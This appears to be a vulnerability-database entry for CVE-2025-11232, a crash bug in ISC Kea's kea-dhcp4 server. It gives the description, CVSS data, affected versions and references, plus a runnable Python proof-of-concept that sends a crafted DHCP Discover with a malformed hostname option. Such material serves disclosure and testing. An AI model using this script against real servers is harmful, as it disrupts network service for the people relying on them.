CVE-2025-11232

Description

To trigger the issue, three configuration parameters must have specific settings: "hostname-char-set" must be left at the default setting, which is "[^A-Za-z0-9.-]"; "hostname-char-replacement" must be empty (the default); and "ddns-qualifying-suffix" must *NOT* be empty (the default is empty). DDNS updates do not need to be enabled for this issue to manifest. A client that sends certain option content would then cause kea-dhcp4 to exit unexpectedly. This issue affects Kea versions 3.0.1 through 3.0.1 and 3.1.1 through 3.1.2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ISC Kea 3.0.1

ISC Kea 3.1.1

ISC Kea 3.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-11232 PoC - ISC Kea DHCP Server DoS
Note: This PoC is for educational and security testing purposes only.
Requires specific Kea configuration to trigger the vulnerability.
"""

import socket
import struct
import sys

def create_dhcp_discover():
    """Create a DHCP Discover packet with crafted hostname option."""
    # DHCP Message Type: Discover (1)
    message_type = b'\x01'
    # Hardware Type: Ethernet (1)
    hardware_type = b'\x01'
    # Hardware Address Length: 6
    hw_addr_len = b'\x06'
    # Hops: 0
    hops = b'\x00'
    # Transaction ID (random)
    xid = b'\x39\x03\xf3\x26'
    # Seconds Elapsed: 0
    seconds = b'\x00\x00'
    # Bootp Flags: 0x8000 (Broadcast)
    flags = b'\x80\x00'
    # Client IP Address: 0.0.0.0
    ciaddr = b'\x00\x00\x00\x00'
    # Your IP Address: 0.0.0.0
    yiaddr = b'\x00\x00\x00\x00'
    # Server IP Address: 0.0.0.0
    siaddr = b'\x00\x00\x00\x00'
    # Gateway IP Address: 0.0.0.0
    giaddr = b'\x00\x00\x00\x00'
    # Client Hardware Address: 00:11:22:33:44:55
    chaddr = b'\x00\x11\x22\x33\x44\x55' + b'\x00' * 10
    # Server Host Name: 64 bytes
    sname = b'\x00' * 64
    # Boot File Name: 128 bytes
    boot_file = b'\x00' * 128
    
    # Magic Cookie
    magic_cookie = b'\x63\x82\x53\x63'
    
    # DHCP Options
    options = b''
    # Option 53: DHCP Message Type
    options += b'\x35\x01\x01'
    # Option 12: Host Name (crafted content)
    # Using characters that match hostname-char-set default regex
    host_name = b'\x0c\x09test\xae\xaf\xb0\xb1\xb2\xb3host'
    options += host_name
    # Option 55: Parameter Request List
    options += b'\x37\x03\x01\x03\x06'
    # End Option
    options += b'\xff'
    
    dhcp_packet = (message_type + hardware_type + hw_addr_len + hops +
                   xid + seconds + flags + ciaddr + yiaddr +
                   siaddr + giaddr + chaddr + sname + boot_file +
                   magic_cookie + options)
    
    return dhcp_packet

def exploit(target_ip='255.255.255.255', target_port=67):
    """Send crafted DHCP packet to trigger vulnerability."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        packet = create_dhcp_discover()
        print(f"[*] Sending crafted DHCP Discover to {target_ip}:{target_port}")
        print(f"[*] Packet size: {len(packet)} bytes")
        sock.sendto(packet, (target_ip, target_port))
        print("[+] Packet sent successfully")
        print("[*] If target has vulnerable configuration, kea-dhcp4 should crash")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else '255.255.255.255'
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11232/
[4] VulDB https://vuldb.com/cve/CVE-2025-11232
[5] https://kb.isc.org/docs/cve-2025-11232
[6] http://www.openwall.com/lists/oss-security/2025/10/29/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11232", "sourceIdentifier": "[email protected]", "published": "2025-10-29T18:15:40.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "To trigger the issue, three configuration parameters must have specific settings: \"hostname-char-set\" must be left at the default setting, which is \"[^A-Za-z0-9.-]\"; \"hostname-char-replacement\" must be empty (the default); and \"ddns-qualifying-suffix\" must *NOT* be empty (the default is empty). DDNS updates do not need to be enabled for this issue to manifest. A client that sends certain option content would then cause kea-dhcp4 to exit unexpectedly.\nThis issue affects Kea versions 3.0.1 through 3.0.1 and 3.1.1 through 3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-823"}]}], "references": [{"url": "https://kb.isc.org/docs/cve-2025-11232", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}